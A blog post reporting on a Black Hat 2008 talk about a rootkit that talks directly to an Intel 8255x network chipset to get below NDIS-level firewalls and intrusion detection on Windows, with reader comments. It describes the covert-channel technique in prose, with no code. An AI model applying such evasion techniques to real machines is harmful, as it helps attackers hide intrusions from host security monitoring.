Black Hat 2008: NIC based rootkit


While Black Hat and Defcon have both concluded, we’re going to post a few more talks that we think deserve attention. [Sherri Sparks] and [Shawn Embleton] from Clear Hat presented Deeper Door, exploiting the NIC chipset. Windows machines use NDIS, the Network Driver Interface Specification, to communicate between the OS and the actual NIC. NDIS is an API that lets programmers talk to network hardware in a general fashion. Most firewalls and intrusion detection systems monitor packets at the NDIS level. The team took a novel approach to bypassing machine security by hooking directly to the network card, below the NDIS level.

The team targeted the Intel 8255x chipset because of its open documentation and availability of compatible cards like the Intel PRO/100B. They found that sending data was very easy: Write a UDP packet to a specific memory address, check to make sure the card is idle, and then tell it to send. The receive side was slightly more difficult, because you have to intercept all inbound traffic and filter out the replies you want from the legitimate packets. Even though they were writing low level chipset specific code, they said it was much easier to implement than writing an NDIS driver. While a certainly a clever way to implement a covert channel, it will only bypass an IDS or firewall on the same host and not one on the network.

[photo: Big Fat Rat]

Comments

  1. Eric says:

    … just another supporting reason for the physical security of your infrastructure!

  2. Comm_Hawk says:

    Not a hack. If someone is soldering things to my network card….

    Now if they could remotely rewrite the ROM(Joke intended) thats a hack!

  3. Cypress says:

    This is not a hack. It’s just direct hardware access. You’re simply skirting the system. I’d also consider this obvious.

    Tapping an Ethernet cable and injecting/sniffing data in transit, is also not hacking, its just like anything else.

  4. stealthed-port says:

    This is not a hack. Changing the MAC address on the fly is more practical.

  5. stealthed-port says:

    This is not a hack. Changing the MAC address on the fly is more practical.

  6. stealthed-port says:

    This is not a hack. Changing the MAC address on the fly is more practical.

  7. TJHooker says:

    Where they tapping hardware or writing drivers?

  8. Casey Banner says:

    Where does it say they required physical access?

    They are writing drivers, which are run on the pc…all this can be done remotely.

  9. TJHooker says:

    @Casey Banner: ^^

  10. supernova_hq says:

    I just find it amusing that they said it was easier to code directly for the hardware than to use the API Microsoft probably spent hundreds of thousands of dollars to develop.

  11. wat. says:

    “Not a hack”?

    This is one of the most important parts once your are post-root (meaning you have root by physical access or SSH etc.) Having a rootkit on a machine is insurance that you will not get noticed. It doesn’t matter how you get one on.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 94,628 other followers